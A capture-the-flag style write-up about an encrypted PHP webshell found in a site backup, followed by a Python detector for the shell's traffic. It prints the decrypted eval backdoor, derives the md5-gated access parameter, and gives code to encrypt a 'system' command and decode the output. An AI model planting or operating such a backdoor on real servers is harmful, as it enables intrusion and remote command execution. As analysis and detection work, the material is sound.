First, scan the site's directories; the scan turns up a backup file.
In the backup, find describedssTest.php.
Open it:
<?php
error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
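// Encrypt: AES-128-CBC with the fixed IV $v8, then prepend the IV and base64 twice.
// $K is the 32-character $p8; OpenSSL silently truncates it to the 16 bytes the cipher needs.
function e($D, $K) {
    $cipher = 'aes-128-cbc';
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
    $result = base64_encode($GLOBALS['v8'] . $encrypted);
    $result = base64_encode($result);
    return $result;
}
// Decrypt: undo both base64 layers, skip the 16-byte IV prefix, decrypt with the fixed IV $v8.
function d($D, $K) {
    $cipher = 'aes-128-cbc';
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
    return $decrypted;
}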
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);
?>
Decrypting $d8 gives:
<?php
@eval("if(md5(@\$_GET['id']) === \$p8) {
@eval(trim(d(\$_POST['d'], \$p8)));
}");
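Next, work out what produces p8:
3b7430adaed18facca7b799229138b7b
It is the result of applying md5 twice to 20241026. The shell compares md5 of the id parameter with $p8, so the GET request must use id=04c50eb4bc04c76311d03550ee2c1b71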
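The following code, run together with the e(), d(), $p8 and $v8 definitions above, generates the encrypted shell command. Send the resulting value in a POST request as d=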
$q = 'system("ls /");';
$encrypted_q = e($q, $p8);
echo "Encrypted: " . $encrypted_q . "\n";
$decrypted_q = d($encrypted_q, $p8);
echo "Decrypted: " . $decrypted_q . "\n";
Use
echo d($aaa, $p8);
and replace aaa with the value returned by the server to get the shell's output.
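Added example, not part of the original write-up: because e() prepends the fixed IV $v8 before the two outer base64 layers, every request and response of this shell starts with the same characters, which gives a defender a signature to search captured traffic or logs for. The function names and SAMPLE_FIELDS are constructed for illustration; the IV and the $a8 blob are taken from the page.

```python
import base64
import binascii

AES_BLOCK = 16                # aes-128-cbc block size and IV length
IV = b"0329647546905494"      # $v8 from describedssTest.php
# $a8 from the page, used here as a known sample of the wire format
A8 = "TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0="

def wire_prefix(iv: bytes) -> str:
    """Leading characters that a fixed IV forces onto every e() output."""
    # Only whole 3-byte groups encode independently of what follows, so keep
    # just the stable part at each of the two outer base64 layers.
    mid = base64.b64encode(iv[: len(iv) // 3 * 3])
    return base64.b64encode(mid[: len(mid) // 3 * 3]).decode()

def parse_message(blob: str):
    """Peel both base64 layers; return (iv, ciphertext) or None if malformed."""
    try:
        inner = base64.b64decode(base64.b64decode(blob, validate=True), validate=True)
        ct = base64.b64decode(inner[AES_BLOCK:], validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(inner) <= AES_BLOCK or not ct or len(ct) % AES_BLOCK:
        return None
    return inner[:AES_BLOCK], ct

def scan(fields, iv=IV):
    """Return (field name, ciphertext length) for values in the shell's format."""
    prefix = wire_prefix(iv)
    hits = []
    for name, value in fields:
        parsed = parse_message(value) if value.startswith(prefix) else None
        if parsed and parsed[0] == iv:
            hits.append((name, len(parsed[1])))
    return hits

# Constructed request fields: one carries the page's $a8 blob, two are benign.
SAMPLE_FIELDS = [("d", A8), ("token", "dXNlcj1hbGljZQ=="), ("q", "hello world")]

if __name__ == "__main__":
    print(wire_prefix(IV))
    print(scan(SAMPLE_FIELDS))
```

A value that matches can then be decrypted offline with the key and IV recovered from the file, as d() does, to see what was sent.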